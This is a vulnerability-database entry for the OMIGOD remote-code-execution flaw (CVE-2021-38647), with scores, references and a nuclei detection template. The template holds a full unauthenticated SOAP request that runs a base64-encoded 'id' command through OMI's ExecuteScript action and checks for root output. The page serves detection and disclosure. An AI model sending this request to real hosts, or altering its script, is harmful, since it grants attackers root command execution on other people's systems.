Lucene search
K

Microsoft Open Management Infrastructure - Remote Code Execution

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 38 Views

Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD). Successful exploitation could allow an attacker to execute arbitrary code with SYSTEM privileges. Updates published on GitHub on August 11, 2021

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2021-38647
18 Sep 202115:25
githubexploit
GithubExploit
Exploit for CVE-2021-38647
15 Sep 202121:44
githubexploit
GithubExploit
Exploit for CVE-2021-38647
22 Sep 202115:20
githubexploit
GithubExploit
Exploit for CVE-2021-38647
19 Sep 202115:43
githubexploit
GithubExploit
Exploit for CVE-2021-38647
15 Sep 202104:51
githubexploit
GithubExploit
Exploit for CVE-2021-38647
16 Sep 202108:33
githubexploit
GithubExploit
Exploit for CVE-2021-38647
13 Mar 202420:05
githubexploit
GithubExploit
Exploit for CVE-2021-38647
16 Sep 202102:11
githubexploit
GithubExploit
Exploit for CVE-2021-38647
20 Sep 202116:29
githubexploit
0day.today
Microsoft OMI Management Interface Authentication Bypass Exploit
31 Oct 202100:00
zdt
Rows per page
id: CVE-2021-38647

info:
  name: Microsoft Open Management Infrastructure - Remote Code Execution
  author: daffainfo,xstp
  severity: critical
  description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with SYSTEM privileges.
  remediation: Updates for this vulnerability were published on GitHub on August 11, 2021.
  reference:
    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
    - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
    - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
    - https://github.com/microsoft/omi
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-38647
    cwe-id: CWE-287
    epss-score: 0.99723
    epss-percentile: 0.99951
    cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microsoft
    product: azure_automation_state_configuration
  tags: cve2021,cve,rce,omi,microsoft,kev,vkev,vuln

http:
  - raw:
      - |
        POST /wsman HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/soap+xml;charset=UTF-8

        <s:Envelope
          xmlns:s="http://www.w3.org/2003/05/soap-envelope"
          xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
          xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
          xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema"
          xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
          xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
          <s:Header>
            <a:To>HTTP://{{Hostname}}/wsman/</a:To>
            <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
            <a:ReplyTo>
              <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
            </a:ReplyTo>
            <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
            <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
            <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
            <w:OperationTimeout>PT1M30S</w:OperationTimeout>
            <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
            <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
            <w:OptionSet s:mustUnderstand="true"/>
            <w:SelectorSet>
              <w:Selector Name="__cimnamespace">root/scx</w:Selector>
            </w:SelectorSet>
          </s:Header>
          <s:Body>
            <p:ExecuteScript_INPUT
              xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
              <p:Script>aWQ=</p:Script>
              <p:Arguments/>
              <p:timeout>0</p:timeout>
              <p:b64encoded>true</p:b64encoded>
            </p:ExecuteScript_INPUT>
          </s:Body>
        </s:Envelope>

    matchers:
      - type: word
        words:
          - '<p:StdOut>'
          - 'uid=0(root) gid=0(root) groups=0'
        condition: and
# digest: 4a0a0047304502202738d19d07b76cc0e43481628eea6a9af7f3974dfc249ccef8b28c7533d679e7022100db4699b38e10062108134248827e57af8a04735cbaea30d9907136088f1f22a8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.2High risk
Vulners AI Score8.2
CVSS 27.5
CVSS 3.19.8
EPSS0.99723
SSVC
38